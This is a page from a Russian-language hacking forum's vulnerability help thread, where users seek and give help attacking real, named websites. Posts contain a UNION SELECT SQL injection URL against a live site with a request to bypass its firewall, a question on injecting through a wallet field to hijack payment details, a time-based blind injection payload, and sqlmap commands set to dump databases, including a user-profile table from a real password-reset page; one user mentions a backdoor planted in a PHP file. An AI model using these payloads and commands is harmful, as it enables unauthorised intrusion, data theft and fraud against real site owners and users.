HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 284 из 296 « Первая < 184234274 280 281 282 283 284 285 286 287 288 294 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2831  
Старый 01.06.2020, 18:31
aberkroft
Guest
Сообщений: n/a
Провел на форуме:
14421

Репутация: 3
По умолчанию
Цитата:
Сообщение от pinch  
pinch said:

Вопрос все еще актуален, есть у кого-нибудь идеи?
Сам сервер на бэке один ? Балансировка какого-нибудь нету ?
 
Ответить с цитированием

  #2832  
Старый 02.06.2020, 06:04
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию
отписал в пм, также бэкдор который поставил на php файл (находится на соседней папке) нормально работает, а вот с js такие проблемы
 
Ответить с цитированием

  #2833  
Старый 02.06.2020, 09:38
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию
Опять ваф, помогите обойти, фильт union select

Код:
Code:
https://www.lfv.li/nationalmannschaften/u21-nationalmannschaft/mannschaft/detail/?tx_cfcleagueext_pi4%5BprofileId%5D=2057+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+--+
 
Ответить с цитированием

  #2834  
Старый 03.06.2020, 23:29
ringoz2221
Guest
Сообщений: n/a
Провел на форуме:
785

Репутация: 0
По умолчанию
Нужна помощь

В коде сайта есть код на привязку кошелька

Работает он примерно так:

Код:
Code:
SELECT COUNT(*) FROM db_purse WHERE purse1='{$_GET["purse"]}'
Если кошелёк не найден то выполняеться запрос

Код:
Code:
UPDATE db_purse SET purse1='{$_GET["purse"]}' WHERE user_id='$id'
Но установить purse1 меня не устрайвает в таблице есть ещё purse2 и purse3, есть ли какаето возможность сформировать $_GET["purse"] таким образом чтобы подменить purse2 или purse3?
 
Ответить с цитированием

  #2835  
Старый 04.06.2020, 08:43
aberkroft
Guest
Сообщений: n/a
Провел на форуме:
14421

Репутация: 3
По умолчанию
Попробуй сначала составить ЖЕЛАЕМЫЙ запрос, который приведет к изменению значения поля, при этом не меняя исходный, а только дополняя его. После этого станет понятно, что модифицировать.
 
Ответить с цитированием

  #2836  
Старый 10.06.2020, 19:46
troni900
Guest
Сообщений: n/a
Провел на форуме:
227

Репутация: 0
По умолчанию
Приветствую! Помогите правильно составить POST запрос для sqlmap

Код:
Code:
bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&player-leagie-box=on&silver=on
 
Ответить с цитированием

  #2837  
Старый 11.06.2020, 04:03
ringoz2221
Guest
Сообщений: n/a
Провел на форуме:
785

Репутация: 0
По умолчанию
Цитата:
Сообщение от aberkroft  
aberkroft said:

Попробуй сначала составить ЖЕЛАЕМЫЙ запрос, который приведет к изменению значения поля, при этом не меняя исходный, а только дополняя его. После этого станет понятно, что модифицировать.
Я сильно в этом не шарю но всё что перепробывал мне не помогло
 
Ответить с цитированием

  #2838  
Старый 12.06.2020, 22:06
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию
Цитата:
Сообщение от troni900  
troni900 said:

Приветствую! Помогите правильно составить POST запрос для sqlmap
Код:
Code:
bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&player-leagie-box=on&silver=on
Get

Sqlmap.py --url "site.com/index.php?

bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=*&p layer-leagie-box=on&silver=on" --dbs --risk=3 --level=3 --random-agent

Post

Sqlmap.py --url "site.com/index.php" --data="

bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=*&p layer-leagie-box=on&silver=on" --dbs --risk=3 --level=3 --random-agent

Суд по всему это выхлоп с акуши, так что я бы сильно не надеялся раскрутить,ещё к тому же слепую, дампится будет хрен пойми сколько, без шела никак
 
Ответить с цитированием

  #2839  
Старый 12.06.2020, 22:09
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
акуша)
 
Ответить с цитированием

  #2840  
Старый 23.06.2020, 01:48
kostea
Guest
Сообщений: n/a
Провел на форуме:
9857

Репутация: 0
По умолчанию
Помогите пожалуйста, возвращает пустой результат

Код:
Code:
--url="https://eos.aidainternational.org/ResetPassword/3297bc2d-815c-46fd-9488-57433cb3de5a*" --flush-session --risk=3 --level=3 -D dbo -T UserProfiles --dump
 
Ответить с цитированием
Ответ
Страница 284 из 296 « Первая < 184234274 280 281 282 283 284 285 286 287 288 294 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ